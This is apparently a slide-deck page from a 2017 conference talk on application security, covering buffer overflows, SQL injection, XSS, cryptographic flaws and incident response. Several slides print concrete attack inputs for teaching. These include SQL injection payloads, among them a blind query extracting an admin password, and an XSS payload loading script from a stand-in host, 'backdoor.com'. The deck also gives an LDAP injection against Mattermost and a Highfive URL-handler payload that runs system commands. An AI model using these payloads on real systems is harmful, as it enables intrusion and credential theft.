AOEconf17: Application Security
3 likes885 views
Application security involves securing software from attack vectors like code execution, buffer overflows, SQL injection, cross-site scripting, cryptography weaknesses, and business logic errors. Common attacks exploit vulnerabilities like injecting SQL commands, executing JavaScript in privileged contexts, or making authorized systems behave unexpectedly. Preventive actions include thorough code reviews, staying up-to-date on patches, reacting quickly to incidents, and having controls like firewalls and deployment strategies that limit impact.
AOEconf17: Application Security
- 1. Application Security AOE Conf 2017
- 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
- 5. Code Execution Make a system execute arbitrary code
- 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
- 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
- 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
- 9. Cryptography Attack cryptographic measures for confidentiality and integrity
- 10. Signatures • Fake signatures/tokens for unauthorised access
- 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
- 12. Business Logic Make legit code behave in an unintended way
- 13. Race Conditions • Re-order execution flows to change an operations result
- 14. Exploit basics
- 15. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
- 16. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x";
- 17. SQL Injection • Query: SELECT * FROM logs WHERE token="${TOKEN}"; • Token: a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING( (SELECT password FROM users WHERE name="admin" LIMIT 1) ,0,1) = 'a', SLEEP(5), 0) -- x";
- 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
- 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
- 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
- 21. Exploits samples
- 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
- 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
- 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
- 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
- 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
- 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
- 31. Highfive RCE • Prevention: whitelist redirect targets
- 32. JWT Null Tokens
- 33. JWT Null Tokens
- 34. JWT Null Tokens
- 35. JWT Null Tokens
- 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
- 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
- 39. Stay up to date
- 40. React fast
- 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis